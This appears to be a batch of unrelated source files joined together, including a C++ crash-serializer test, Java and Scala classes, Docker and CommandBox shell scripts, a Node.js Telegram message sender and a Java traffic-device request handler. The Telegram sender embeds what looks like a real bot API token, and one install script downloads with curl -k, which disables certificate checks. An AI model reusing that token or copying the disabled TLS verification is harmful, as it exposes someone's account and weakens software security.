EXPECT_EQ(info.fields(field_idx).key(), "error_type");
EXPECT_EQ(info.fields(field_idx).text(), "fake_error");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "guid");
EXPECT_EQ(info.fields(field_idx).text(), "00112233445566778899aabbccddeeff");
field_idx++;
if (missing_file_ != kTextFile) {
EXPECT_EQ(info.fields(field_idx).key(), "footext");
EXPECT_EQ(info.fields(field_idx).text(), "upload_text_contents");
field_idx++;
}
EXPECT_EQ(info.fields(field_idx).key(), "foovar");
EXPECT_EQ(info.fields(field_idx).text(), "bar");
field_idx++;
int num_blobs = 1;
if (missing_file_ != kBinFile) {
num_blobs++;
}
if (missing_file_ != kLogFile) {
num_blobs++;
}
ASSERT_EQ(blobs.size(), num_blobs);
int blob_idx = 0;
EXPECT_EQ(blobs[blob_idx].key(), "upload_file_fake_payload");
EXPECT_EQ(blobs[blob_idx].blob(), "foobar_payload");
EXPECT_EQ(blobs[blob_idx].filename(), payload_file_relative.value());
blob_idx++;
if (missing_file_ != kBinFile) {
EXPECT_EQ(blobs[blob_idx].key(), "foofile");
EXPECT_EQ(blobs[blob_idx].blob(), "upload_file_contents");
EXPECT_EQ(blobs[blob_idx].filename(), file_var_file_relative.value());
blob_idx++;
}
if (missing_file_ != kLogFile) {
EXPECT_EQ(blobs[blob_idx].key(), "log");
EXPECT_EQ(blobs[blob_idx].blob(), "foobar_log");
EXPECT_EQ(blobs[blob_idx].filename(), log_file_relative.value());
blob_idx++;
}
if (missing_file_ != kCoreFile && fetch_core_) {
EXPECT_EQ(core_path, core_file_absolute);
} else {
EXPECT_EQ(core_path, base::FilePath());
}
}
INSTANTIATE_TEST_SUITE_P(CrashSerializerParameterizedTestInstantiation,
CrashSerializerParameterizedTest,
testing::Combine(testing::Bool(),
testing::Bool(),
testing::Values(kNone,
kPayloadFile,
kLogFile,
kTextFile,
kBinFile,
kCoreFile)));
} // namespace crash_serializer
|
<filename>packages/react-topology/src/components/factories/index.ts
export { default as RegisterComponentFactory } from './RegisterComponentFactory';
export { default as RegisterElementFactory } from './RegisterElementFactory';
export { default as RegisterLayoutFactory } from './RegisterLayoutFactory';
export * from './components';
|
def largest_second_largest(arr):
if len(arr) <= 1:
return "There must be at least two elements in the array"
max1 = max(arr[0], arr[1])
max2 = min(arr[0], arr[1])
for i in range(2, len(arr)):
if arr[i] > max1:
max2 = max1
max1 = arr[i]
elif arr[i] > max2:
max2 = arr[i]
return max1, max2 |
package bisondb.cascading;
import cascading.flow.FlowProcess;
import cascading.scheme.Scheme;
import cascading.scheme.SinkCall;
import cascading.scheme.SourceCall;
import cascading.tap.Tap;
import cascading.tuple.Fields;
import cascading.tuple.Tuple;
import bisondb.DomainSpec;
import bisondb.Utils;
import bisondb.document.KeyValDocument;
import bisondb.hadoop.BisonInputFormat;
import bisondb.hadoop.BisonOutputFormat;
import bisondb.hadoop.BisonRecordWritable;
import org.apache.hadoop.io.IntWritable;
import org.apache.hadoop.io.NullWritable;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.OutputCollector;
import org.apache.hadoop.mapred.RecordReader;
import java.io.IOException;
public class BisonScheme extends Scheme<JobConf, RecordReader, OutputCollector, Object[], Object[]> {
public BisonScheme(Fields sourceFields, Fields sinkFields, DomainSpec spec) {
setSourceFields(sourceFields);
setSinkFields(sinkFields);
}
@Override public void sourceConfInit(FlowProcess<JobConf> flowProcess,
Tap<JobConf, RecordReader, OutputCollector> tap, JobConf conf) {
conf.setInputFormat(BisonInputFormat.class);
}
@Override public void sinkConfInit(FlowProcess<JobConf> flowProcess,
Tap<JobConf, RecordReader, OutputCollector> tap, JobConf conf) {
conf.setOutputKeyClass(IntWritable.class); // be explicit
conf.setOutputValueClass(BisonRecordWritable.class); // be explicit
conf.setOutputFormat(BisonOutputFormat.class);
}
@Override public void sourcePrepare(FlowProcess<JobConf> flowProcess,
SourceCall<Object[], RecordReader> sourceCall) {
sourceCall.setContext(new Object[2]);
sourceCall.getContext()[0] = sourceCall.getInput().createKey();
sourceCall.getContext()[1] = sourceCall.getInput().createValue();
}
@Override public boolean source(FlowProcess<JobConf> flowProcess,
SourceCall<Object[], RecordReader> sourceCall) throws IOException {
NullWritable key = (NullWritable) sourceCall.getContext()[0];
BisonRecordWritable value = (BisonRecordWritable) sourceCall.getContext()[1];
boolean result = sourceCall.getInput().next(key, value);
if (!result)
return false;
sourceCall.getIncomingEntry().setTuple(new Tuple(value.key, value.value));
return true;
}
@Override public void sink(FlowProcess<JobConf> flowProcess,
SinkCall<Object[], OutputCollector> sinkCall) throws IOException {
Tuple tuple = sinkCall.getOutgoingEntry().getTuple();
int shard = tuple.getInteger(0);
Object f1 = tuple.getObject(1);
Object f2 = tuple.getObject(2);
byte[] key = (byte[]) f1;
byte[] val = (byte[]) f2;
KeyValDocument pair = new KeyValDocument(key, val);
sinkCall.getOutput().collect(new IntWritable(shard), new BisonRecordWritable(pair.key, pair.value));
}
}
|
#!/bin/sh
file="$1"
shift 1
refmt --parse re --print binary $file | graphql_ppx -schema ../graphql_schema.json $@ /dev/stdin /dev/stdout | refmt --parse binary --print re
|
#!/bin/bash
# -----------------------------------------------------------------------------
# Trivadis - Part of Accenture, Platform Factory - Transactional Data Platform
# Saegereistrasse 29, 8152 Glattbrugg, Switzerland
# -----------------------------------------------------------------------------
# Name.......: buildAllDB.sh
# Author.....: Stefan Oehrli (oes) stefan.oehrli@trivadis.com
# Editor.....: Stefan Oehrli
# Date.......: 2018.03.13
# Revision...:
# Purpose....: Build script to build all trivadis/xxx docker images
# Notes......:
# Reference..: --
# License....: Apache License Version 2.0, January 2004 as shown
# at http://www.apache.org/licenses/
# -----------------------------------------------------------------------------
# Modified...:
# see git revision history for more information on changes/updates
# -----------------------------------------------------------------------------
# - Customization -----------------------------------------------------------
# - End of Customization ----------------------------------------------------
# - Default Values ----------------------------------------------------------
DOCKER_USER=${DOCKER_USER:-"trivadis"}
DOCKER_REPO=${DOCKER_REPO:-"ora_db"}
DOCKER_LOCAL_USER=${DOCKER_LOCAL_USER:-"oracle"}
DOCKER_LOCAL_REPO=${DOCKER_LOCAL_REPO:-"database"}
echo "INFO : Process all ${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:* images ...."
ORACLE_IMAGES=$(docker images --filter=reference="${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:*" --format "{{.Repository}}:{{.Tag}}")
# lets count the images
n=$(docker images --filter=reference="${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:*" --format "{{.Repository}}:{{.Tag}}"|wc -l|sed 's/ *//g')
j=1
for i in ${ORACLE_IMAGES}; do
version=$(echo $i|cut -d: -f2)
echo "INFO : push image $j of $n"
echo "INFO : tag image ${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:$version"
docker tag ${DOCKER_LOCAL_USER}/${DOCKER_LOCAL_REPO}:$version ${DOCKER_USER}/${DOCKER_REPO}:$version
echo "INFO : push image ${DOCKER_USER}/${DOCKER_REPO}:$version"
time docker push ${DOCKER_USER}/${DOCKER_REPO}:$version
echo "INFO : untag image ${DOCKER_USER}/${DOCKER_REPO}:$version"
docker rmi ${DOCKER_USER}/${DOCKER_REPO}:$version
((j++)) # increment counter
done
# --- EOF ------------------------------------------------------------------- |
<gh_stars>1-10
/*
Copyright (c) 2013, Groupon, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
Neither the name of GROUPON nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.groupon.util.xml;
import com.groupon.util.ConfigureException;
import com.groupon.util.NamedObjectFactory;
import org.dom4j.Element;
import java.lang.reflect.ParameterizedType;
/**
* @author <EMAIL>
*/
public class XmlObjectFactory<T> {
private NamedObjectFactory<T> fKnownTypes;
private Class<? extends T> fClass;
private boolean fbConcreteClass;
public XmlObjectFactory() {
Class cl = getClass();
if (cl != XmlObjectFactory.class) {
for (; cl.getSuperclass() != XmlObjectFactory.class; cl = cl.getSuperclass()) ;
ParameterizedType type = (ParameterizedType) cl.getGenericSuperclass();
fClass = (Class) type.getActualTypeArguments()[0];
}
}
public XmlObjectFactory(Class<? extends T> cl) {
fClass = cl;
}
public XmlObjectFactory(NamedObjectFactory<T> types) {
fKnownTypes = types;
}
public XmlObjectFactory<T> setConcreteClass(Class<? extends T> cl) {
fClass = cl;
fbConcreteClass = true;
return this;
}
public T instance(Element node) throws ConfigureException {
String type = node.attributeValue("type");
T r = null;
if (type != null) {
r = fKnownTypes.getNamedObject(type);
if (r == null) {
throw new ConfigureException("Unknown type: " + type);
}
} else {
String cls = node.attributeValue("class");
if (cls == null) {
if (!fbConcreteClass)
throw new ConfigureException("No type or class specified: " + node.asXML());
try {
r = (T) fClass.newInstance();
} catch (Throwable t) {
throw new ConfigureException(t);
}
} else {
try {
Class cl = Class.forName(cls);
if (!cl.isAssignableFrom(cl)) {
throw new ConfigureException("Class must be derived from " + fClass.getName() + ": " + node.asXML());
}
fClass = cl;
r = (T) cl.newInstance();
} catch (Throwable t) {
throw new ConfigureException(node.asXML(), t);
}
}
}
if (r instanceof XmlConfigurable) {
((XmlConfigurable) r).configure(node);
}
return r;
}
}
|
<reponame>ArthurVBS/PyRockPaperScissors
#Import - Libs
from tkinter import *
#Function - Assets
def assets(directory):
assets = {
'rock_dic' : PhotoImage(file= directory + "/Assets/rock.png"),
'paper_dic' : PhotoImage(file= directory + "/Assets/paper.png"),
'scissors_dic' : PhotoImage(file= directory + "/Assets/scissors.png"),
'question_mark_dic' : PhotoImage(file= directory + "/Assets/question_mark.png")}
return assets
|
/*
* Copyright (c) 2013, 2017, Oracle and/or its affiliates. All rights reserved.
* ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*/
package com.sun.webkit.dom;
import org.w3c.dom.html.HTMLLIElement;
public class HTMLLIElementImpl extends HTMLElementImpl implements HTMLLIElement {
HTMLLIElementImpl(long peer) {
super(peer);
}
static HTMLLIElement getImpl(long peer) {
return (HTMLLIElement)create(peer);
}
// Attributes
public String getType() {
return getTypeImpl(getPeer());
}
native static String getTypeImpl(long peer);
public void setType(String value) {
setTypeImpl(getPeer(), value);
}
native static void setTypeImpl(long peer, String value);
public int getValue() {
return getValueImpl(getPeer());
}
native static int getValueImpl(long peer);
public void setValue(int value) {
setValueImpl(getPeer(), value);
}
native static void setValueImpl(long peer, int value);
}
|
#!/bin/bash
# Installs the latest CommandBox Binary
mkdir -p /tmp
curl -k -o /tmp/box.zip -location "https://downloads.ortussolutions.com/ortussolutions/commandbox/${COMMANDBOX_VERSION}/commandbox-bin-${COMMANDBOX_VERSION}.zip"
unzip /tmp/box.zip -d ${BIN_DIR} && chmod +x ${BIN_DIR}/box
echo "$(box version) successfully installed"
# Cleanup CommandBox modules which would not be necessary in a Container environment
SYSTEM_EXCLUDES=( "coldbox" "contentbox" "cachebox" "forgebox" "logbox" "games" "wirebox" )
MODULE_EXCLUDES=( "cfscriptme-command" "cb-module-template" )
for mod in "${SYSTEM_EXCLUDES[@]}"
do
rm -rf $HOME/.CommandBox/cfml/system/modules_app/${mod}-commands
done
for mod in "${MODULE_EXCLUDES[@]}"
do
rm -rf $HOME/.CommandBox/cfml/modules/${mod}
done
$BUILD_DIR/util/optimize.sh
|
package com.github.lhrb.xml;
import java.util.List;
public class Leaf implements Tag {
private final String name;
private final List<Attribute> attributes;
private final String text;
private Leaf(String name, List<Attribute> attributes, String text) {
this.name = name;
this.attributes = attributes;
this.text = text;
}
static Tag create(String name, List<Attribute> attributes, String text) {
return new Leaf(name, attributes, text);
}
@Override
public String xmlString(Integer depth) {
return String.format("%s<%s%s>%s</%s>\n",
Tag.depthToSpacePrefix(depth),
name,
Tag.attrsToStr(attributes),
text,
name);
}
}
|
#!/bin/bash
cd ..
echo "pulling repository on master..."
git checkout master
git pull
|
<filename>modules/jaeger-thrift-http-exporter/src/test/scala/io/janstenpickle/trace4cats/jaeger/JaegerHttpSpanExporterSpec.scala
package io.janstenpickle.trace4cats.jaeger
import cats.effect.{IO, Resource}
import fs2.Chunk
import io.janstenpickle.trace4cats.`export`.SemanticTags
import io.janstenpickle.trace4cats.model.{Batch, TraceProcess}
import io.janstenpickle.trace4cats.test.jaeger.BaseJaegerSpec
import org.http4s.blaze.client.BlazeClientBuilder
import java.time.Instant
class JaegerHttpSpanExporterSpec extends BaseJaegerSpec {
it should "Send a batch of spans to jaeger" in forAll { (batch: Batch[Chunk], process: TraceProcess) =>
val updatedBatch =
Batch(
batch.spans.map(span =>
span.copy(
serviceName = process.serviceName,
attributes = (process.attributes ++ span.attributes) -- excludedTagKeys,
start = Instant.now(),
end = Instant.now()
)
)
)
val exporter = BlazeClientBuilder[IO].resource.flatMap { client =>
Resource.eval(JaegerHttpSpanExporter[IO, Chunk](client, process, "localhost", 14268))
}
testExporter(
exporter,
updatedBatch,
batchToJaegerResponse(
updatedBatch,
process,
SemanticTags.kindTags,
SemanticTags.statusTags("span."),
SemanticTags.processTags,
internalSpanFormat = "jaeger"
)
)
}
}
|
import json
from typing import Any
class ModelManager:
def __init__(self, local_config_file: str, local_lonestar_model_file: str, TEST_DATA_BASE: str):
self.local_config_file = local_config_file
self.local_lonestar_model_file = local_lonestar_model_file
self.TEST_DATA_BASE = TEST_DATA_BASE
self.local_config = None
self.expected_dicebox_serialized_model = None
self.expected_compiled_model = None
self.local_input_size = 784
self.local_output_size = 10
def load_local_config_file(self, config_file: str):
with open(config_file, "r") as json_file:
self.local_config = json.load(json_file)
def load_lonestar_model_file(self, model_file: str):
with open(model_file, "r") as json_file:
self.expected_dicebox_serialized_model = json.load(json_file)
def load_compiled_model_file(self, model_file: str):
with open("%s/lonestar.model.json" % self.TEST_DATA_BASE, "r") as json_file:
self.expected_compiled_model = json.load(json_file)
def get_input_size(self) -> int:
return self.local_input_size
def get_output_size(self) -> int:
return self.local_output_size
def compare_models(self) -> bool:
return self.expected_dicebox_serialized_model == self.expected_compiled_model |
/*******************************************************************************
* This file is part of the Symfony eclipse plugin.
*
* (c) <NAME> <<EMAIL>>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
******************************************************************************/
package com.dubture.symfony.core.model;
public class Resource {
public static int ROUTE_RESOURCE = 0;
public String path;
public int type;
public String prefix;
@Override
public String toString() {
return String.format("%s => %s", path, type);
}
}
|
<filename>src/main/steamworks/index.ts<gh_stars>0
import Steamworks from './steamworks';
export * from './types';
export default Steamworks;
|
#!/bin/bash
source ${HOLOGRAM_DIR}/buildscripts/returncodes.sh
cd ${HOLOGRAM_DIR} && export GIT_TAG=$(git describe --tags --long | sed 's/-/\./' | sed 's/-g/-/' | sed 's/-/~/')
if [ "$1" != "--no-compile" ]; then
compile_hologram.sh || exit $?
fi
mkdir -p /hologram-build/{server,agent}/root/usr/local/bin
mkdir -p /hologram-build/{server,agent}/root/etc/hologram
mkdir -p /hologram-build/{server,agent}/scripts/
mkdir -p /hologram-build/{server,agent}/root/etc/init.d/
# Copy files needed for the agent package
install -m 0644 ${HOLOGRAM_DIR}/config/agent.json /hologram-build/agent/root/etc/hologram/agent.json
install -m 0755 ${BIN_DIR}/hologram /hologram-build/agent/root/usr/local/bin/
install -m 0755 ${BIN_DIR}/hologram-agent /hologram-build/agent/root/usr/local/bin/
install -m 0755 ${BIN_DIR}/hologram-authorize /hologram-build/agent/root/usr/local/bin/
install -m 0755 ${HOLOGRAM_DIR}/agent/support/linux/after-install_{deb,rpm}.sh /hologram-build/agent/scripts/
install -m 0755 ${HOLOGRAM_DIR}/agent/support/linux/before-remove.sh /hologram-build/agent/scripts/
install -m 0755 ${HOLOGRAM_DIR}/agent/support/linux/init.sh /hologram-build/agent/root/etc/init.d/hologram-agent
# Copy files needed for the server package
install -m 0644 ${HOLOGRAM_DIR}/config/server.json /hologram-build/server/root/etc/hologram/server.json
install -m 0755 ${BIN_DIR}/hologram-server /hologram-build/server/root/usr/local/bin/
install -m 0755 ${HOLOGRAM_DIR}/server/after-install_{deb,rpm}.sh /hologram-build/server/scripts/
install -m 0755 ${HOLOGRAM_DIR}/server/before-remove.sh /hologram-build/server/scripts/
install -m 0755 ${HOLOGRAM_DIR}/server/support/hologram.init.sh /hologram-build/server/root/etc/init.d/hologram-server
ARTIFACTS_DIR=${HOLOGRAM_DIR}/artifacts
mkdir -p ${ARTIFACTS_DIR}
cd /hologram-build/agent
for pkg in deb rpm ; do
fpm -f -s dir -t ${pkg} -n hologram-agent -v ${GIT_TAG} --after-install /hologram-build/agent/scripts/after-install_${pkg}.sh --before-remove /hologram-build/agent/scripts/before-remove.sh --config-files /etc/hologram/agent.json -C /hologram-build/agent/root -p ${ARTIFACTS_DIR}/hologram-${GIT_TAG}.${pkg} -a amd64 . || exit ${ERRLINPKG}
done
cd /hologram-build/server
for pkg in deb rpm ; do
fpm -f -s dir -t ${pkg} -n hologram-server -v ${GIT_TAG} --after-install /hologram-build/server/scripts/after-install_${pkg}.sh --before-remove /hologram-build/server/scripts/before-remove.sh --config-files /etc/hologram/server.json -C /hologram-build/server/root -p ${ARTIFACTS_DIR}/hologram-server-${GIT_TAG}.${pkg} -a amd64 . || exit ${ERRLINPKG}
done
|
import React from 'react';
import stacksData from "../../data/stacks"
import ListItem from "./ListItem"
export default function Stacks(props) {
return (
<div id="development-stacks">
<div className="row">
<div className="col-lg-12">
<p className="lead">
Select a stack to filter related experience and works.
</p>
</div>
</div>
<div className="row">
<div className="col-lg-4">
<ListItem
data={stacksData.backend}
filters={props.filters}
handleSetFilters={props.handleSetFilters} />
</div>
<div className="col-lg-4">
<ListItem
data={stacksData.frontend}
filters={props.filters}
handleSetFilters={props.handleSetFilters} />
</div>
<div className="col-lg-4">
<ListItem
data={stacksData.supports}
filters={props.filters}
handleSetFilters={props.handleSetFilters} />
</div>
</div>
</div>
)
}
|
#!/bin/sh
sed -i "s/time=12/time=01/g" jobs/i16j*
sed -i "s/partition=medium/partition=short/g" jobs/i16j*
for file in jobs/*; do
sbatch $file
done
|
<reponame>khaled-11/Botai<gh_stars>0
// Function to get app data
const axios = require ("axios");
module.exports = async (id, name, text) => {
var data;
if (name === "mark"){
data = new TextEncoder().encode(
JSON.stringify({
text:text,
parse_mode:'markdown',
chat_id:id,
protect_content : true
})
)
} else {
data = new TextEncoder().encode(
JSON.stringify({
chat_id:id,
parse_mode:'HTML',
text:`${text}`
})
)
}
const url = `https://api.telegram.org/bot5058153020:AAENUXQeAxlmi_Q1ncTUwNCOoXXLeS4RqwU/sendMessage`;
const OPTIONS = {
headers: {
'Content-Type': 'application/json',
'Content-Length': data.length,
},
}
try {
const ress = await axios.post(url, data, OPTIONS);
console.log(ress.data)
return ('success');
} catch (error) {
console.log(error)
return ('fail');
}
} |
#!/usr/bin/env bash
set -o xtrace
set -e
LOG_LEVEL="slog/max_level_info"
echo "%%%%%% Testing default features %%%%%%"
cargo clippy --all-targets -- -D warnings
cargo test --features "$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing default features %%%%%%"
# these also test without the use_local_executor feature
echo "%%%%%% Testing different ser_id sizes %%%%%%"
cargo clippy --all-targets --no-default-features --features ser_id_8 -- -D warnings
cargo test --no-default-features --features ser_id_8,"$LOG_LEVEL" -- "$@"
cargo test --no-default-features --features ser_id_16,"$LOG_LEVEL" -- "$@"
cargo test --no-default-features --features ser_id_32,"$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing different ser_id sizes %%%%%%"
echo "%%%%%% Testing thread pinning %%%%%%"
cargo clippy --all-targets --features thread_pinning -- -D warnings
cargo test --features thread_pinning,"$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing thread pinning %%%%%%"
echo "%%%%%% Testing low_latency %%%%%%"
cargo clippy --all-targets --features low_latency -- -D warnings
cargo test --features low_latency,"$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing low_latency %%%%%%"
echo "%%%%%% Testing type_erasure %%%%%%"
cargo clippy --all-targets --features type_erasure -- -D warnings
cargo test --features type_erasure,"$LOG_LEVEL" -- "$@"
echo "%%%%%% Finished testing type_erasure %%%%%%"
|
var debug = require('debug')('bankai.node-manifest')
var parseJson = require('fast-json-parse')
var fs = require('fs')
var utils = require('./utils')
var DEFAULT_COLOR = Buffer.from('#fff')
var DEFAULT_DESCRIPTION = Buffer.from('')
var DEFAULT_MANIFEST = Buffer.from(JSON.stringify({
name: '',
short_name: '',
start_url: '/',
display: 'minimal-ui',
background_color: '#fff',
theme_color: '#fff'
}))
var filenames = [
'manifest.json'
]
module.exports = node
function node (state, createEdge, emit) {
var basedir = utils.dirname(state.metadata.entry)
var self = this
if (state.metadata.watch && !state.metadata.watchers.manifest) {
state.metadata.watchers.manifest = true
debug('watching ' + basedir + ' for ' + filenames.join(', '))
var unwatch = utils.watch(basedir, filenames, parse)
this.on('close', function () {
debug('closing file watcher')
unwatch()
})
}
parse()
function parse () {
debug('parsing')
utils.find(basedir, filenames, function (err, filename) {
if (err) {
createEdge('color', DEFAULT_COLOR)
createEdge('description', DEFAULT_DESCRIPTION)
createEdge('bundle', DEFAULT_MANIFEST)
return
}
fs.readFile(filename, function (err, file) {
if (err) return self.emit('error', 'manifest', 'fs.readfile', err)
var res = parseJson(file)
if (res.err) return self.emit('error', 'manifest', 'JSON.parse', res.err)
debug('creating edges')
createEdge('description', Buffer.from(res.value.description || ''))
createEdge('color', Buffer.from(res.value.theme_color || '#fff'))
createEdge('bundle', Buffer.from(JSON.stringify(res.value)))
})
})
}
}
|
#!/bin/bash
set -eu
docker build . -t $APPNAME:$BUILDKITE_BUILD_NUMBER
|
function isPalindrome(str) {
let reversedStr = str.split('').reverse().join('');
return str === reversedStr;
} |
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package org.fhwa.c2cri.tmdd.emulation.generic;
import java.util.ArrayList;
import org.fhwa.c2cri.centermodel.emulation.exceptions.EntityEmulationException;
import org.fhwa.c2cri.infolayer.MessageSpecification;
import org.fhwa.c2cri.tmdd.TMDDAuthenticationProcessor;
import org.fhwa.c2cri.tmdd.TMDDErrorResponseProcessor;
import org.fhwa.c2cri.tmdd.emulation.TMDDEntityType;
import org.fhwa.c2cri.tmdd.emulation.TMDDMessageProcessor;
import org.fhwa.c2cri.tmdd.emulation.TMDDNRTMSelections;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityCommandProcessor;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityCommandQueue;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityControlRequestStatus;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityControlRequestStatusCollector;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityControlRequestStatusRecord;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityDataOrganizationInformationCollector;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityEmulationRequests;
import org.fhwa.c2cri.tmdd.emulation.exceptions.InvalidCommandException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.InvalidEntityControlRequestLogException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.InvalidEntityControlRequestStatusException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.MessageAuthenticationException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.NRTMViolationException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.NoMatchingDataException;
import org.fhwa.c2cri.tmdd.emulation.generic.dialogs.DlDeviceCancelControlRequest;
import org.fhwa.c2cri.tmdd.emulation.generic.dialogs.DlDeviceControlStatusRequest;
import org.fhwa.c2cri.tmdd.errorcodes.TMDDMissingInformationError;
/**
*
* @author TransCore ITS, LLC Created: Feb 15, 2016
*/
public class GenericDeviceHandler implements EntityControlRequestStatusCollector, EntityCommandProcessor {
private EntityDataOrganizationInformationCollector orgInfoDataCollector;
public void initialize() throws EntityEmulationException {
}
private GenericDeviceHandler() {
}
;
public GenericDeviceHandler(EntityDataOrganizationInformationCollector orgInfoCollector) {
this.orgInfoDataCollector = orgInfoCollector;
}
public MessageSpecification getRRResponse(String dialog, MessageSpecification requestMessage) {
MessageSpecification responseMsg = null;
// try {
//
// // Verify that the request message satisfies the project NRTM Settings
// TMDDNRTMSelections.getInstance().verifyMessageNRTM(dialog, requestMessage, TMDDEntityType.EntityType.GENERIC);
//
// // Verify that the request message satisfies any project Authentication requirements.
// TMDDAuthenticationProcessor.getInstance().processRequestMessageAuthentication(dialog, requestMessage, TMDDEntityType.EntityType.GENERIC);
switch (dialog) {
case "dlDeviceCancelControlRequest":
String msgCancelDeviceID = (requestMessage.getElementValue("*." + "device-id"));
String msgCancelRequestID = (requestMessage.getElementValue("*." + "request-id"));
String msgCancelOrgID = (requestMessage.getElementValue("*." + "organization-requesting.organization-id"));
if ((msgCancelDeviceID != null) && !msgCancelDeviceID.isEmpty()&& (msgCancelRequestID != null) && !msgCancelRequestID.isEmpty() && (msgCancelOrgID != null) && !msgCancelOrgID.isEmpty()){
try {
// Figure out which Entity Type is associated with this device id.
TMDDEntityType.EntityType entityType = EntityCommandQueue.getInstance().getControlRequestEntityType(msgCancelOrgID, msgCancelDeviceID, msgCancelRequestID);
DlDeviceCancelControlRequest controlCancelDialogProcessor = new DlDeviceCancelControlRequest();
responseMsg = controlCancelDialogProcessor.handle(requestMessage, EntityEmulationRequests.EntityRequestMessageType.DEVICECANCELCONTROLREQUESTMSG, entityType, null, null, this);
} catch (Exception ex){ // Error finding a matching entityType. Just use Generic ...
DlDeviceCancelControlRequest controlCancelDialogProcessor = new DlDeviceCancelControlRequest();
responseMsg = controlCancelDialogProcessor.handle(requestMessage, EntityEmulationRequests.EntityRequestMessageType.DEVICECANCELCONTROLREQUESTMSG, TMDDEntityType.EntityType.GENERIC, null, null, this);
}
} else {
TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "missing information prevents processing message", "The message received did not contain correct device-id, request-id or organization-id values for the dlCancelControlRequest dialog.");
}
break;
// responseMsg = TMDDMessageProcessor.processDeviceCancelControlRequestMsg(requestMessage, this);
// break;
case "dlDeviceControlStatusRequest":
String msgDeviceID = (requestMessage.getElementValue("*." + "device-id"));
String msgRequestID = (requestMessage.getElementValue("*." + "request-id"));
String msgOrgID = (requestMessage.getElementValue("*." + "organization-requesting.organization-id"));
if ((msgDeviceID != null) && !msgDeviceID.isEmpty()&& (msgRequestID != null) && !msgRequestID.isEmpty() && (msgOrgID != null) && !msgOrgID.isEmpty()){
try {
// Figure out which Entity Type is associated with this device id.
TMDDEntityType.EntityType entityType = EntityCommandQueue.getInstance().getControlRequestEntityType(msgOrgID, msgDeviceID, msgRequestID);
DlDeviceControlStatusRequest controlStatusDialogProcessor = new DlDeviceControlStatusRequest();
responseMsg = controlStatusDialogProcessor.handle(requestMessage, EntityEmulationRequests.EntityRequestMessageType.DEVICECONTROLSTATUSREQUESTMSG, entityType, null, null, this);
} catch (Exception ex){ // Error finding a matching entityType. Just use Generic ...
DlDeviceControlStatusRequest controlStatusDialogProcessor = new DlDeviceControlStatusRequest();
responseMsg = controlStatusDialogProcessor.handle(requestMessage, EntityEmulationRequests.EntityRequestMessageType.DEVICECONTROLSTATUSREQUESTMSG, TMDDEntityType.EntityType.GENERIC, null, null, this);
}
} else {
TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "missing information prevents processing message", "The message received did not contain correct device-id, request-id or organization-id values for the dlControlStatusRequest dialog.");
}
break;
// responseMsg = TMDDMessageProcessor.processDeviceControlStatusRequestMsg(requestMessage, this);
// break;
default:
TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "other", "Dialog " + dialog + " is not currently supported by the CCTVHandler.");
break;
}
// } catch (NRTMViolationException ex) {
// TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
// responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "missing information prevents processing message", ex.getMessage());
// } catch (MessageAuthenticationException ex) {
// TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
// responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "authentication not recognized", ex.getMessage());
